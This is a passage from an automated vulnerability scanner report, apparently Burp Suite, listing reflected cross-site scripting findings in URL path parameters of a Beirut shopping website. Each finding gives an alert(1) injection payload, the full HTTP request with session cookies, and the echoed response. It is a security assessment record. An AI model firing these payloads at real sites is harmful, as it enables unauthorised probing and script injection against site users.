Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3b329"><a>52e80b7a0fe">
...[SNIP]...

4.1018. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98bd8'-alert(1)-'9879e2d7893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping98bd8'-alert(1)-'9879e2d7893/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping98bd8'-alert(1)-'9879e2d7893/Home-Furnishings/4120758082/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1019. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e351f'-alert(1)-'c380dbc0e19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingse351f'-alert(1)-'c380dbc0e19/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishingse351f'-alert(1)-'c380dbc0e19/4120758082/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1020. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f13ce<script>alert(1)</script>180069a8d1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsf13ce<script>alert(1)</script>180069a8d1e/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsf13ce<script>alert(1)</script>180069a8d1e <a href="#" id="backlink">
...[SNIP]...

4.1021. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c529'-alert(1)-'8525a6d20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580826c529'-alert(1)-'8525a6d20e2/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580826c529'-alert(1)-'8525a6d20e2/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1022. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e06b'-alert(1)-'bcb2460354f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures3e06b'-alert(1)-'bcb2460354f/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Home-Fixtures3e06b'-alert(1)-'bcb2460354f/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1023. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2b82'-alert(1)-'1ec06449d9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65a2b82'-alert(1)-'1ec06449d9f HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Home-Fixtures/65a2b82'-alert(1)-'1ec06449d9f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1024. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f6"><a>12de46391a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingea5f6"><a>12de46391a1/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingea5f6"><a>12de46391a1">
...[SNIP]...

4.1025. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ffa'-alert(1)-'9eaaa7729ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping83ffa'-alert(1)-'9eaaa7729ee/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping83ffa'-alert(1)-'9eaaa7729ee/Home-Furnishings/4120758082/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1026. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd6d7'-alert(1)-'d285782c34e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingsfd6d7'-alert(1)-'d285782c34e/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsfd6d7'-alert(1)-'d285782c34e/4120758082/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1027. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab586<script>alert(1)</script>4355b8db918 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsab586<script>alert(1)</script>4355b8db918/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsab586<script>alert(1)</script>4355b8db918 <a href="#" id="backlink">
...[SNIP]...

4.1028. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d103'-alert(1)-'4eab40094b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580826d103'-alert(1)-'4eab40094b6/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/41207580826d103'-alert(1)-'4eab40094b6/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1029. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20cc7'-alert(1)-'62a91cb3154 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils20cc7'-alert(1)-'62a91cb3154/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils20cc7'-alert(1)-'62a91cb3154/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1030. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 539a8'-alert(1)-'a6628b9a17d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59539a8'-alert(1)-'a6628b9a17d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
